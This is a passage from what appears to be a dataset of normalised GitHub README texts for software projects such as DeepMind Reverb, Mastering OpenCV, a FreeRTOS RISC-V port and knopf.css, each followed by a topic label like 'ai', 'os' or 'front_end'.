xuanjing huang and zhongyu wei year 2023 eprint 2308 14346 archiveprefix arxiv primaryclass cs cl
ai
PythonBootcamp
pythonbootcamp python scripting and automation python game development web scraping beautiful soup selenium web driver request wtforms data science pandas numpy matplotlib plotly scikit learn seaborn turtle python gui desktop app development tkinter front end web development html 5 css 3 bootstrap 4 bash command line git github and version control backend web development flask rest apis databases sql sqlite postgresql authentication web design deployment with github pages heroku and gunicorn
server
code
mastering opencv with practical computer vision projects full source code for the book source code https github com masteringopencv code book http www packtpub com cool projects with opencv book copyright packt publishing 2012 to build run the projects for the book install opencv versions between 2 4 2 to 2 4 11 are supported whereas opencv 3 0 is not yet supported eg go to http opencv org click on downloads download the latest opencv 2 4 version including prebuilt library and extract it to c opencv for windows or opencv for linux in opencv v2 4 3 the prebuilt opencv library is in c opencv build or opencv build such as c opencv build x64 vc9 for ms visual studio 2008 or vs10 folder for ms visual studio 2010 or the x86 parent folder for 32 bit windows install all the source code of the book eg extract the code to c masteringopencv for windows or masteringopencv for linux install cmake v2 8 or later from http www cmake org each chapter of the book is for a separate project therefore there are 9 projects for the 9 chapters remember that chapter 9 is an online chapter that can be downloaded from http www packtpub com cool projects with opencv book you can run each project separately they each contain a readme md text file describing how to build that project using cmake in most cases because cmake can be used with many compilers and many operating systems chapters ch1 cartoonifier and skin changer for android by shervin emami ch2 marker based augmented reality on iphone or ipad by khvedchenia ievgen ch3 marker less augmented reality by khvedchenia ievgen ch4 exploring structure from motion using opencv by roy shilkrot ch5 number plate recognition using svm and neural networks by david escriv ch6 non rigid face tracking by jason saragih ch7 3d head pose estimation using aam and posit by daniel l lis baggio ch8 face recognition using eigenfaces or fisherfaces by shervin emami ch9 developing fluid wall using the microsoft kinect by naureen mahmood what you need for this book you don t need to have special knowledge in computer vision to read this book but you should have good c c programming skills and basic experience with opencv before reading this book readers without experience in opencv may wish to read the book learning opencv for an introduction to the opencv features or read opencv 2 cookbook for examples on how to use opencv with recommended c c patterns because mastering opencv with practical computer vision projects will show you how to solve real problems assuming you are already familiar with the basics of opencv and c c development in addition to c c and opencv experience you will also need a computer and an ide of your choice such as visual studio xcode eclipse or qtcreator running on windows mac or linux some chapters have further requirements particularly to develop the android app you will need an android device android development tools and basic android development experience to develop the ios app you will need an iphone ipad or ipod touch device ios development tools including an apple computer xcode ide and an apple developer certificate and basic ios and objective c development experience several desktop projects require a webcam connected to your computer any common usb webcam should suffice but a webcam of at least 1 megapixel may be desirable cmake is used in most projects including opencv itself to build across operating systems and compilers a basic understanding of build systems is required and knowledge of cross platform building is recommended an understanding of linear algebra is expected such as basic vector and matrix operations and eigen decomposition per chapter requirements ch1 webcam for desktop app or android development system for android app ch2 ios development system to build an ios app ch3 opengl built into opencv ch4 pcl http pointclouds org and ssba http www inf ethz ch personal chzach opensource html ch5 nothing ch6 nothing but requires training data for execution ch7 nothing ch8 webcam ch9 kinect depth sensor screenshots ch1 cartoonifier and skin changer for android ch1 cartoonifier and skin changer for android https raw github com masteringopencv code master chapter1 androidcartoonifier screenshot png ch2 marker based augmented reality on iphone or ipad ch2 marker based augmented reality on iphone or ipad https raw github com masteringopencv code master chapter2 iphonear screenshot png ch3 marker less augmented reality ch3 marker less augmented reality https raw github com masteringopencv code master chapter3 markerlessar screenshot png ch4 exploring structure from motion using opencv ch4 exploring structure from motion using opencv https raw github com masteringopencv code master chapter4 structurefrommotion screenshot png ch5 number plate recognition using svm and neural networks ch5 number plate recognition using svm and neural networks https raw github com masteringopencv code master chapter5 numberplaterecognition screenshot png ch6 non rigid face tracking ch6 non rigid face tracking https raw github com masteringopencv code master chapter6 nonrigidfacetracking screenshot png ch7 3d head pose estimation using aam and posit ch7 3d head pose estimation using aam and posit https raw github com masteringopencv code master chapter7 headposeestimation screenshot png ch8 face recognition using eigenfaces or fisherfaces ch8 face recognition using eigenfaces or fisherfaces https raw github com masteringopencv code master chapter8 facerecognition screenshot png ch9 developing fluid wall using the microsoft kinect ch9 developing fluid wall using the microsoft kinect https raw github com masteringopencv code master chapter9 fluidinteractionusingkinect screenshot png
ai
reverb
reverb pypi python version https img shields io pypi pyversions dm reverb pypi version https badge fury io py dm reverb svg https badge fury io py dm reverb reverb is an efficient and easy to use data storage and transport system designed for machine learning research reverb is primarily used as an experience replay system for distributed reinforcement learning algorithms but the system also supports multiple data structure representations such as fifo lifo and priority queues table of contents installation installation quick start quick start detailed overview detailed overview tables tables item selection strategies item selection strategies rate limiting rate limiting sharding sharding checkpointing checkpointing citation citation installation please keep in mind that reverb is not hardened for production use and while we do our best to keep things in working order things may break or segfault warning reverb currently only supports linux based oses the recommended way to install reverb is with pip we also provide instructions to build from source using the same docker images we use for releases tensorflow can be installed separately or as part of the pip install installing tensorflow as part of the install ensures compatibility shell pip install dm reverb tensorflow without tensorflow install and version dependency check pip install dm reverb nightly builds pypi version https badge fury io py dm reverb nightly svg https badge fury io py dm reverb nightly shell pip install dm reverb nightly tensorflow without tensorflow install and version dependency check pip install dm reverb nightly debug builds starting with version 0 6 0 debug builds of reverb are uploaded to google cloud storage the builds can be downloaded or installed directly via pip following the patterns below gsutils can be used to navigate the directory structure to ensure the files are there e g gsutil ls gs rl infra builds dm reverb builds dbg to build your own debug binary see the build instructions https github com deepmind reverb tree master reverb pip package create a stable reverb release for python 3 8 and 3 9 follow this pattern shell export reverb version 0 8 0 python 3 9 export python version 39 pip install https storage googleapis com rl infra builds dm reverb builds dbg reverb version dm reverb reverb version cp python version cp python version manylinux2010 x86 64 whl build from source this guide reverb pip package readme md how to develop and build reverb with the docker containers details how to build reverb from source reverb releases due to some underlying libraries such as protoc and absl reverb has to be paired with a specific version of tensorflow if installing reverb as pip install dm reverb tensorflow the correct version of tensorflow will be installed the table below lists the version of tensorflow that each release of reverb is associated with and some versions of interest 0 13 0 dropped python 3 8 support 0 11 0 first version to support python 3 11 0 10 0 last version to support python 3 7 release branch tag tensorflow version nightly master https github com deepmind reverb tf nightly 0 13 0 v0 13 0 https github com deepmind reverb tree v0 13 0 2 14 0 0 12 0 v0 12 0 https github com deepmind reverb tree v0 12 0 2 13 0 0 11 0 v0 11 0 https github com deepmind reverb tree v0 11 0 2 12 0 0 10 0 v0 10 0 https github com deepmind reverb tree v0 10 0 2 11 0 0 9 0 v0 9 0 https github com deepmind reverb tree v0 9 0 2 10 0 0 8 0 v0 8 0 https github com deepmind reverb tree v0 8 0 2 9 0 0 7 x v0 7 0 https github com deepmind reverb tree v0 7 0 2 8 0 quick start starting a reverb server is as simple as python import reverb server reverb server tables reverb table name my table sampler reverb selectors uniform remover reverb selectors fifo max size 100 rate limiter reverb rate limiters minsize 1 create a client to communicate with the server python client reverb client f localhost server port print client server info write some data to the table python creates a single item and data element 0 1 client insert 0 1 priorities my table 1 0 an item can also reference multiple data elements python appends three data elements and inserts a single item which references all of them as a 2 3 4 b 12 13 14 with client trajectory writer num keep alive refs 3 as writer writer append a 2 b 12 writer append a 3 b 13 writer append a 4 b 14 create an item referencing all the data writer create item table my table priority 1 0 trajectory a writer history a b writer history b block until the item has been inserted and confirmed by the server writer flush the items we have added to reverb can be read by sampling them python client sample returns a generator print list client sample my table num samples 2 continue with the reverb tutorial https github com deepmind reverb tree master examples demo ipynb for an interactive tutorial detailed overview experience replay has become an important tool for training off policy reinforcement learning policies it is used by algorithms such as deep q networks dqn dqn soft actor critic sac sac deep deterministic policy gradients ddpg ddpg and hindsight experience replay her however building an efficient easy to use and scalable replay system can be challenging for good performance reverb is implemented in c and to enable distributed usage it provides a grpc service for adding sampling and updating the contents of the tables python clients expose the full functionality of the service in an easy to use fashion furthermore native tensorflow ops are available for performant integration with tensorflow and tf data although originally designed for off policy reinforcement learning reverb s flexibility makes it just as useful for on policy reinforcement or even un supervised learning creative users have even used reverb to store and distribute frequently updated data such as model weights acting as an in memory lightweight alternative to a distributed file system where each table represents a file tables a reverb server consists of one or more tables a table holds items and each item references one or more data elements tables also define sample and removal selection strategies item selection strategies a maximum item capacity and a rate limiter rate limiting multiple items can reference the same data element even if these items exist in different tables this is because items only contain references to data elements as opposed to a copy of the data itself this also means that a data element is only removed when there exists no item that contains a reference to it for example it is possible to set up one table as a prioritized experience replay per for transitions sequences of length 2 and another table as a fifo queue of sequences of length 3 in this case the per data could be used to train dqn and the fifo data to train a transition model for the environment using multiple tables docs images multiple tables example png items are automatically removed from the table when one of two conditions are met 1 inserting a new item would cause the number of items in the table to exceed its maximum capacity table s removal strategy is used to determine which item to remove 1 an item has been sampled more than the maximum number of times permitted by the table s rate limiter such item is deleted data elements not referenced anymore by any item are also deleted users have full control over how data is sampled and removed from reverb tables the behavior is primarily controlled by the item selection strategies item selection strategies provided to the table as the sampler and remover in combination with the rate limiter rate limiting and max times sampled a wide range of behaviors can be achieved some commonly used configurations include uniform experience replay a set of n 1000 most recently inserted items are maintained by setting sampler reverb selectors uniform the probability to select an item is the same for all items due to reverb rate limiters minsize 100 sampling requests will block until 100 items have been inserted by setting remover reverb selectors fifo when an item needs to be removed the oldest item is removed first python reverb table name my uniform experience replay buffer sampler reverb selectors uniform remover reverb selectors fifo max size 1000 rate limiter reverb rate limiters minsize 100 examples of algorithms that make use of uniform experience replay include sac and ddpg prioritized experience replay a set of n 1000 most recently inserted items by setting sampler reverb selectors prioritized priority exponent 0 8 the probability to select an item is proportional to the item s priority note see schaul tom et al per for the algorithm used in this implementation of prioritized experience replay python reverb table name my prioritized experience replay buffer sampler reverb selectors prioritized 0 8 remover reverb selectors fifo max size 1000 rate limiter reverb rate limiters minsize 100 examples of algorithms that make use of prioritized experience replay are dqn and its variants and distributed distributional deterministic policy gradients d4pg queue collection of up to n 1000 items where the oldest item is selected and removed in the same operation if the collection contains 1000 items then insert calls are blocked until it is no longer full if the collection is empty then sample calls are blocked until there is at least one item python reverb table name my queue sampler reverb selectors fifo remover reverb selectors fifo max size 1000 max times sampled 1 rate limiter reverb rate limiters queue size 1000 or use the helper classmethod queue reverb table queue name my queue max size 1000 examples of algorithms that make use of queues are impala https arxiv org abs 1802 01561 and asynchronous implementations of proximal policy optimization https arxiv org abs 1707 06347 item selection strategies reverb defines several selectors that can be used for item sampling or removal uniform sample uniformly among all items prioritized samples proportional to stored priorities fifo selects the oldest data lifo selects the newest data minheap selects data with the lowest priority maxheap selects data with the highest priority any of these strategies can be used for sampling or removing items from a table this gives users the flexibility to create customized tables that best fit their needs rate limiting rate limiters allow users to enforce conditions on when items can be inserted and or sampled from a table here is a list of the rate limiters that are currently available in reverb minsize sets a minimum number of items that must be in the table before anything can be sampled sampletoinsertratio sets that the average ratio of inserts to samples by blocking insert and or sample requests this is useful for controlling the number of times each item is sampled before being removed queue items are sampled exactly once before being removed stack items are sampled exactly once before being removed sharding reverb servers are unaware of each other and when scaling up a system to a multi server setup data is not replicated across more than one node this makes reverb unsuitable as a traditional database but has the benefit of making it trivial to scale up systems where some level of data loss is acceptable distributed systems can be horizontally scaled by simply increasing the number of reverb servers when used in combination with a grpc compatible load balancer the address of the load balanced target can simply be provided to a reverb client and operations will automatically be distributed across the different nodes you ll find details about the specific behaviors in the documentation of the relevant methods and classes if a load balancer is not available in your setup or if more control is required then systems can still be scaled in almost the same way simply increase the number of reverb servers and create separate clients for each server checkpointing reverb supports checkpointing the state and content of reverb servers can be stored to permanent storage while checkpointing the server serializes all of its data and metadata needed to reconstruct it during this process the server blocks all incoming insert sample update and delete requests checkpointing is done with a call from the reverb client python client checkpoint returns the path the checkpoint was written to checkpoint path client checkpoint to restore the reverb server from a checkpoint python the checkpointer accepts the path of the root directory in which checkpoints are written if we pass the root directory of the checkpoints written above then the new server will load the most recent checkpoint written from the old server checkpointer reverb platform checkpointers lib defaultcheckpointer path checkpoint path rsplit 1 0 the arguments passed to tables must be the same as those used by the server that wrote the checkpoint server reverb server tables checkpointer checkpointer refer to tfrecord checkpointer h https github com deepmind reverb tree master reverb cc platform tfrecord checkpointer h for details on the implementation of checkpointing in reverb starting reverb using reverb server beta installing dm reverb using pip will install a reverb server script which accepts its config as a textproto for example bash reverb server config port 8000 tables table name my table sampler fifo true remover fifo true max size 200 max times sampled 5 rate limiter min size to sample 1 samples per insert 1 min diff python3 c import sys print sys float info max max diff python3 c import sys print sys float info max the rate limiter config is equivalent to the python expression minsize 1 see rate limiters py citation if you use this code please cite the reverb paper https arxiv org abs 2102 04736 as misc cassirer2021reverb title reverb a framework for experience replay author albin cassirer and gabriel barth maron and eugene brevdo and sabela ramos and toby boyd and thibault sottiaux and manuel kroiss year 2021 eprint 2102 04736 archiveprefix arxiv primaryclass cs lg links to papers go here d4pg https arxiv org abs 1804 08617 ddpg https arxiv org abs 1509 02971 dqn https www nature com articles nature14236 her https arxiv org abs 1707 01495 per https arxiv org abs 1511 05952 sac https arxiv org abs 1801 01290
os
udacity-elastic-image-filter
udagram image filtering microservice the microservice beanstlak project can be found a href http image filter starter code dev3 us east 1 elasticbeanstalk com here a udagram is a simple cloud application developed alongside the udacity cloud engineering nanodegree it allows users to register and log into a web client post photos to the feed and process photos using an image filtering microservice the project is split into three parts 1 the simple frontend https github com udacity cloud developer tree master course 02 exercises udacity c2 frontend a basic ionic client web application which consumes the restapi backend covered in the course 2 the restapi backend https github com udacity cloud developer tree master course 02 exercises udacity c2 restapi a node express server which can be deployed to a cloud service covered in the course 3 the image filtering microservice https github com udacity cloud developer tree master course 02 project image filter starter code the final project for the course it is a node express application which runs a simple script to process images your assignment tasks setup node environment you ll need to create a new node server open a new terminal within the project directory and run 1 initialize a new project npm i 2 run the development server with npm run dev create a new endpoint in the server ts file the starter code has a task for you to complete an endpoint in src server ts which uses query parameter to download an image from a public url filter the image and return the result we ve included a few helper functions to handle some of these concepts and we re importing it for you at the top of the src server ts file typescript import filterimagefromurl deletelocalfiles from util util deploying your system follow the process described in the course to eb init a new application and eb create a new environment to deploy your image filter service don t forget you can use eb deploy to push changes stand out optional refactor the course restapi if you re feeling up to it refactor the course restapi to make a request to your newly provisioned image server authentication prevent requests without valid authentication headers note if you choose to submit this make sure to add the token to the postman collection and export the postman collection file to your submission so we can review custom domain name add your own domain name and have it point to the running services try adding a subdomain name to point to the processing server note domain names are not included in aws free tier and will incur a cost
cloud
frontend-tips
frontend tips html css http codeguide co http instanceof pro code guide js airbnb https github com airbnb javascript javascript ru https learn javascript ru coding style http isobar idev github io code standards css https github com necolas idiomatic css tree master translations ru ru https github com web standards ru dictionary 1 css https github com yoksel common words 2 html https github com ademaro css class list blob main readme md 3 css https github com nicothin idiomatic pre css blob gh pages words and abbreviations md http habrahabr ru post 273471 front end developer handbook 2017 https frontendmasters gitbooks io front end handbook 2017 content 10 en https web dev one line layouts https www notion so ademaro a7049d6381f84c72a7dcd5f24824117a html5 whatwg https developers whatwg org 2 https html spec whatwg org multipage w3c https www w3 org tr html51 html5 https pp vk me c627726 v627726125 665f lt tk5tljk0 jpg http html5doctor com http bitsofco de 2015 sectioning content in html5 div section article eng http pepelsbey net pres sense coding http pepelsbey net 2011 07 sense coding http design for business ru analytics articles id 504 htm http www smashingmagazine com 2012 12 17 css baseline the good the bad and the ugly 2 http zellwk com blog why vertical rhythms html https habr com en post 546994 aria html5 http prgssr ru development ispolzovanie aria v html5 html http www cmsmagazine ru library items graphical design nesting sites for people with disabilities http blog gov design blog 2016 11 08 accessibility html https te st ru 2015 02 25 reframing accessibility for the web web html5 wai aria https habrahabr ru post 240065 http nicothin pro page dostupnost veb stranicy wcag https webaim org resources contrastchecker https www a11yproject com checklist 5 https www better dev most common a11y mistakes image replacement https css tricks com the image replacement museum css https habr com post 256109 https habrahabr ru company yandex blog 276035 https yoksel github io html tree 2 https nglazov github io bem validator page css https nicothin github io idiomatic pre css flexbox http pepelsbey net 2013 05 flexbox gotcha http html5 by blog flexbox https codepen io ademaro full zwgwxe http bennettfeely com flexplorer https github com philipwalton flexbugs http bitsofco de 6 reasons to start using flexbox https www smashingmagazine com 2016 02 the flexbox reading list flexbox https preview webflow com preview flexbox game preview d1a26b027c4803817087a91c651e321f m 1 http flexboxfroggy com http www flexboxdefense com http www cssauthor com css flexbox 11 flexbox https habrahabr ru post 329820 flexbox css3 flexible box https habrahabr ru post 313938 css tricks https css tricks com snippets css a guide to flexbox css flex https habr com ru company ruvds blog 515298 grid layout https www youtube com watch v jorvuilxlxu https pepelsbey net pres grid layout https www youtube com watch v gdg6mv hdls http css moscow 2 grid layout pdf https cssgridgarden com css tricks https css tricks com snippets css complete guide grid css grid generator https grid layoutit com grid cheatsheet yoksel https yoksel github io grid cheatsheet grids on mdn https developer mozilla org en us docs learn css css layout grids css minmax grid https habr com en company ruvds blog 529830 css grid https habr com en company macloud blog 564182 adaptive https habr com en company ruvds blog 525410 javascript es5 javascript https habrahabr ru post 281110 throttling debouncing https medium com nuances of programming throttling debouncing 4f0a839769ef throttling vs debouncing en https css tricks com debouncing throttling explained examples debounce vs throttle vs audit vs sample https dev to rxjs debounce vs throttle vs audit vs sample difference you should know 1f21 html script async defer module nomodule src https tproger ru translations script execution order reduce en https www freecodecamp org news the ultimate guide to javascript array methods reduce en https www freecodecamp org news how to count objects in an array https developer mozilla org ru docs web javascript reference operators nullish coalescing operator lexicalenvironment closures ecmascript https habr com en post 474852 js dom https habr com ru company macloud blog 557422 git http githowto com ru http pcottle github io learngitbranching http rogerdudler github io git guide index ru html http habrahabr ru post 268951 https www youtube com watch v uww7tvgcdh8 https github com ademaro technomart http githowto com ru atlassian en https www atlassian com git en https help github com 19 git http habrahabr ru company mailru blog 267595 https github com tiimgreen github cheat sheet https github com nicothin web development tree master git github https habrahabr ru company 2gis blog 306166 git https medium com abatickaya d0 be d1 85 d1 82 d0 b2 d0 be d1 8e d0 bc d0 b0 d1 82 d1 8c git 7b269498afd7 bc9rsiows https gitmoji carloscuesta me 2 https www webpagefx com tools emoji cheat sheet git http frontender info git the safety net for your projects git happens 6 git https habr com company flant blog 419733 https habr com en post 416887 git https habr com en company flant blog 472278 https dangitgit com ru https ohshitgit com ru git svg svg https svgontheweb com ru svg http habrahabr ru company devexpress blog 269331 svg use with external source en https css tricks com svg use external source svg css https habrahabr ru post 348194 favicons svg favicons https austingil com svg favicons fonts https www cssfontstack com 2016 https habrahabr ru post 310044 c localstorage woff2 https htmlacademy ru blog 61 maps google maps https habrahabr ru post 324880 https leafletjs com examples quick start https github com shramov leaflet plugins blob master layer tile yandex md advanced z index http habrahabr ru post 166435 22 css https betterprogramming pub 22 css tricks that can make you a layout ninja 452847fba639 https habrahabr ru post 174057 front end http alexfedoseev com post 54 frontend project build https developers google com web fundamentals performance rendering stick to compositor only properties and manage layer count the future of css scroll linked animations with scroll timeline pt 1 https www bram us 2021 02 23 the future of css scroll linked animations part 1 prefetch preconnect prerender https scotch io tutorials browser resource hinting with prefetch preconnect and prerender preload prefetch and other link tags https 3perf com blog link rels 1 critical render path https habr com en company hh blog 513940 web animations api web animations api http css live ru articles pogovorim ob web animations api html 1 http css live ru articles rukovodstvo po web animations api chast 1 sozdanie bazovoj animacii html 2 animationplayer http css live ru articles rukovodstvo po web animations api chast 2 animationplayer i upravlenie vremennoj shkaloj html 3 http css live ru articles rukovodstvo po web animations api chast 3 mnozhestvennye animacii html 4 http css live ru articles rukovodstvo po web animations api chast 4 gruppovye i posledovatelnye effekty html 5 http css live ru articles rukovodstvo po web animations api chast 5 priyatnaya traektoriya dvizheniya html preprocessors easy media queries shortcodes w less tester tag https codepen io jokerinteractive pen vyrozd postcss quickstart guide gulp setup http webdesign tutsplus com tutorials postcss quickstart guide gulp setup cms 24543 4 postcss https habrahabr ru post 280988 css en http ipestov com 22 essential css recipes postcss http forwebdev ru css about postcss sass css stylelint en http www creativenightly com 2016 02 how to lint your css with stylelint sass 1 http prgssr ru development estetichnyj sass chast 1 arhitektura i organizaciya html 2 http prgssr ru development estetichnyj sass chast 2 cveta i palitry html 3 http prgssr ru development estetichnyj sass chast 3 tipografika i vertikalnyj ritm html email email https www caniemail com 2 https www campaignmonitor com css html https sendhtmail ru 2 https putsmail com optimization 2021 https habr com en company mailru blog 543434 14 https habr com en post 684836 security http https habr com en company timeweb blog 568288 tools css https habr com ru company macloud blog 557580 psd http freebiesbug com psd freebies website template http www freepik com free psd web templates https psdrepo com tag free psd website templates https symu co freebies templates 4 https dcrazed com free photoshop psd website templates http blazrobar com tag full website design examples sliders http tympanus net development parallaxcontentslider http tympanus net tutorials fullscreenslitslider icons http line25 com articles free pure css icon sets https github com ihorzenich html5checklist javascript https makehtml github io everyone has js https bitsofco de all about favicons and touch icons https github com makehtml what happens when blob russian readme ru rst what forces layout reflow https gist github com paulirish 5d52fb081b3570c81e3a 10 https nicothin pro page windows subsystem for linux https medium com swlh are you using svg favicons yet a guide for modern browsers 836a6aace3df
front_end
Awesome-GPT
awesome gpt awesome https awesome re badge svg https awesome re awesome papers datasets and projects about the study of large language models like gpt 3 gpt 3 5 chatgpt gpt 4 etc papers survey a survey on in context learning arxiv 2023 paper https arxiv org pdf 2301 00234 pdf a survey on gpt 3 arxiv 2023 paper https arxiv org pdf 2212 00857 pdf a survey of large language models arxiv 2023 paper https arxiv org pdf 2303 18223 pdf 2023 tree of thoughts deliberate problem solving with large language models arxiv 2023 paper https arxiv org pdf 2305 10601 pdf code https github com princeton nlp tree of thought llm gpt 4 technical report openai 2023 paper https cdn openai com papers gpt 4 pdf react synergizing reasoning and acting in language models iclr 2023 notable top 5 paper https openreview net pdf id we vluyul x code https anonymous 4open science r react 2268 selection inference exploiting large language models for interpretable logical reasoning iclr 2023 notable top 5 paper https openreview net pdf id 3pf3wg6o a4 what learning algorithm is in context learning investigations with linear models iclr 2023 notable top 5 paper https openreview net pdf id 0g0x4h8yn4i language models are greedy reasoners a systematic formal analysis of chain of thought iclr 2023 paper https arxiv org pdf 2210 01240 pdf code https github com asaparov prontoqa visual chatgpt talking drawing and editing with visual foundation models arxiv 2023 paper https arxiv org pdf 2303 04671 pdf code https github com microsoft visual chatgpt toolformer language models can teach themselves to use tools arxiv 2023 paper https arxiv org pdf 2302 04761 pdf code https github com lucidrains toolformer pytorch check your facts and try again improving large language models with external knowledge and automated feedback arxiv 2023 paper https arxiv org pdf 2302 12813 pdf can gpt 3 perform statutory reasoning arxiv 2023 paper https arxiv org pdf 2302 06100v1 pdf how close is chatgpt to human experts comparison corpus evaluation and detection arxiv 2023 paper https arxiv org pdf 2301 07597 pdf large language models can be easily distracted by irrelevant context arxix 2023 paper https arxiv org pdf 2302 00093 pdf theory of mind may have spontaneously emerged in large language models arxiv 2023 paper https arxiv org ftp arxiv papers 2302 2302 02083 pdf chatgpt makes medicine easy to swallow an exploratory case study on simplified radiology reports arxiv 2023 paper https arxiv org pdf 2212 14882 pdf 2022 large language models are zero shot reasoners neurips 2022 paper https arxiv org pdf 2205 11916 pdf chain of thought prompting elicits reasoning in large language models paper https arxiv org pdf 2201 11903 pdf automatic chain of thought prompting in large language models paper https arxiv org pdf 2210 03493 pdf what can transformers learn in context a case study of simple function classes arxiv 2022 paper https arxiv org pdf 2208 01066 pdf code https github com dtsip in context learning rethinking the role of demonstrations what makes in context learning work arxiv 2022 paper https arxiv org pdf 2202 12837 pdf code https github com alrope123 rethinking demonstrations why can gpt learn in context language models secretly perform gradient descent as meta optimizers arxiv 2022 paper https arxiv org pdf 2212 10559 pdf 2021 medically aware gpt 3 as a data generator for medical dialogue summarization pmlr 2021 paper https proceedings mlr press v149 chintagunta21a chintagunta21a pdf gpt understands too arxiv 2021 paper https arxiv org pdf 2103 10385 pdf webgpt browser assisted question answering with human feedback arxiv 2021 paper https arxiv org pdf 2112 09332 pdf code https www microsoft com en us bing apis bing web search api 2020 language models are few shot learners neurips 2020 paper https arxiv org pdf 2005 14165 pdf datasets hello simpleai hc3 https huggingface co datasets hello simpleai hc3 projects awesome chatgpt prompts https github com f awesome chatgpt prompts
ai
FreeRTOS-RISCV
obsolete this repository is no longer maintained as risc v support was officially added to freertos freertos homepage https www freertos org freertos ports https www freertos org rtos ports html upstream repository https sourceforge net projects freertos quickstart guide https www freertos org using freertos on risc v html risc v quick start freertos for risc v this is a port of freertos to risc v contributors the original port to priv spec 1 7 was contributed by technolution https interactive freertos org hc en us community posts 210030246 32 bit and 64 bit risc v using gcc update to priv spec 1 9 illustris https github com illustris update to priv spec 1 9 1 abhinaya agrawal https bitbucket org casl freertos riscv v191 src bug fixes julio gago https github com julio gago metempsy update to priv spec 1 10 sherrbc1 https github com sherrbc1 build you can edit main in main c demo riscv spike main c to add your freertos task definitions and set up the scheduler to build freertos bash cd demo riscv spike export riscv opt riscv your riscv tools path here make run bash spike riscv spike elf tested environments tested on a rocket risc v processor with local interrupt controller clint using preemption tested in spike and verilator with several builds including single task multi task and typical demo test including queues semaphores mutexes and about a dozen concurrent tasks
risc-v freertos
os
CareFinder
carefinder project for the course in4325 information retrieval web information systems delft university of technology assignment by mytomorrows https mytomorrows com milestones milestones assets milestones png
server
Geography-Quiz-App
geography quiz app
server
front-end-system-design
front end system design a checklist for front end system design requirements how many users where are users distributed what is our frame budget do we need to support mobile offline support internationalization accessibility browser targets architecture mvc mvw container component architecture data flow model two way data binding vs unidirectional data flow component tree design system walkthrough performance patterns fast initial load time app shell architecture ssr caching rehydrate application state from prev cached state assets route based code splitting minification dead code stripping network lazy vs eager loading service worker caching api requests compute webgl webassembly webworkers sharedarraybuffer ui optimistic ui virtual list examples design a facebook messenger client design a gigapixel client design the uber client design the twitter newsfeed design the google docs client design a performance dashboard for a client side app readings facebook bigpipe https www facebook com notes facebook engineering bigpipe pipelining web pages for high performance 389414033919 making slack faster by being lazy https slack engineering making slack faster by being lazy 88da4481baa7 design an image hosting platform http www aosabook org en distsys html
front_end
phoenix-rtos-utils
phoenix rtos utils this repository contains basic phoenix rtos utilities e g psh phoenix shell and psd phoenix serial downloader to learn more refer to the phoenix rtos documentation https github com phoenix rtos phoenix rtos doc this work is licensed under a bsd license see the license file for details
os
knopf.css
knopf css modern modular extensible button system designed for both rapid prototyping and production ready applications made by frameable https frameableinc com the team behind social hour https socialhour com and subtask https subtask co installation just download http knopf dev knopf css zip and include the minified stylesheet on your website p html link rel stylesheet href knopf min css you could also link to a cdn hosted file html link rel stylesheet href https unpkg com knopf css knopf min css otherwise you can use your favorite package manager to install it as a dependency install with npm npm install knopf css install with yarn yarn add knopf css and then import it wherever you are importing your styles node import knopf css usage by including knopf you get a bunch of goodies https codepen io hiroagustin full mdvrdvg out of the box however you should probably customize the styles to meet your design needs and there are multiple ways of doing just that override default values all of the base values can be changed by overriding the custom properties at root css root knopf hue 164 knopf saturation 88 knopf luminosity 28 html button class knopf button button extend via modifier you can also create your own class that sets new values for a particular instance css negative knopf hue 356 knopf saturation 57 knopf luminosity 51 html button class knopf negative button button leverage the cascade as with any css library you can override the base class to make it your own this aproach still lets you take advantage of the existing properties variables and modifiers css knopf knopf knopf raised height 6px border block end color hsl var knopf hover background color border block end width var knopf raised height margin block start calc var knopf raised height 1 knopf knopf hover knopf raised height 2px border block end color hsl var knopf active background color html button class knopf large wide pill button button the same logic is applicable to all of the built in modifiers try out the playground https knopf dev playground to check them out i would also suggest taking a look at the source code https github com team video knopf css blob main knopf css for the full list of customizable custom properties you can see the full test suite on this pen https codepen io hiroagustin full mdvrdvg contributing please read the contribution guidelines contributing md in order to make the contribution process easy and effective for everyone involved
knopf css css-framework utility-classes design-system ui-component
os
GrIPS
grips gradient free edit based instruction search for prompting large language models authors archiki prasad https archiki github io peter hase https peterbhase github io xiang zhou https owenzx github io and mohit bansal https www cs unc edu mbansal unc chapel hill paper https arxiv org abs 2203 07281 note this is preliminary version of our code the complete code to run all experiments in the paper will be added shortly img src assets main pipeline png alt teaser image width 7500 dependencies this code is written using pytorch and huggingface s transformer repo https github com huggingface pytorch transformers running grips with gpt 2 models requires access to gpus the search is quite light weight no model training involved and therefore one gpu should suffice on the other hand running grips with instructgpt or gpt 3 models requires an openai api key please add your key to the openai key txt file installation the simplest way to run our code is to start with a fresh environment conda create n grips python 3 9 source activate grips pip install r requirements txt running search run search py contains the implementation of grips by default we use the instructgpt babbage model to use a different gpt 3 model from the api change model name in nat inst gpt3 py to switch to gpt 2 models import nat inst gpt2 py and use an apporpriate model expanded encodeinstructions py is a data loader file that interfaces with the task datasets provided in natural instructions here is an example code to run grips with default instructgpt babbage python run search py mode instruction only task idx 0 train seed 0 num compose 1 num candidates 5 num iter 10 patience 2 write preds meta dir logs meta name babbage all edits l 1 m 5 n 10 seed 0 txt acknowledgments we thank the authors and contributors of callibrate before use https github com tonyzhaozh few shot learning and natural instructions https github com allenai natural instructions for their public code release reference please cite our paper if you use our code in your works bibtex article prasad2022grips title grips gradient free edit based instruction search for prompting large language models author archiki prasad and peter hase and xiang zhou and mohit bansal year 2022 archiveprefix arxiv primaryclass cs cl eprint 2203 07281
ai
ton-docs
img align left width 300px src static img readme about png ton blockchain documentation this is the official repository for the open network documentation latest documentation release docs ton org https docs ton org the mission of this documentation is to collect all available information and knowledge that can help ton developers you can improve the documentation by following steps below img align right width 300px src static img readme contribute png join ton docs club ton is an actively growing ecosystem and every day many devs contribute to its development you can participate in ton by helping organize knowledge making pull requests and creating tutorials to help other developers feedback lectures technical articles tutorials and examples all this can help the developers community grow even faster join ton docs club chat in telegram to join contributors party https t me c 0fvo4xhqsyowm8 img align left width 300px src static img readme how png how to contribute if you are a developer and faced some difficulties successfully overcoming them share this knowledge with future developers have an issue prepare a solution with ton docs wizard https t me ton docs bot have an idea submit a feature request https github com ton community ton docs issues new choose want to contribute setup your environment https github com ton community ton docs set up your environment ef b8 8f contributing best practices docs contribute https ton org docs contribute set up your environment if you are changing the sidebar or adding media files please check that your submission will not break production you can do this in two ways cloud quick way use gitpod a free online vs code like ide for contributing it will launch a workspace with a single click open in gitpod https gitpod io button open in gitpod svg https gitpod io 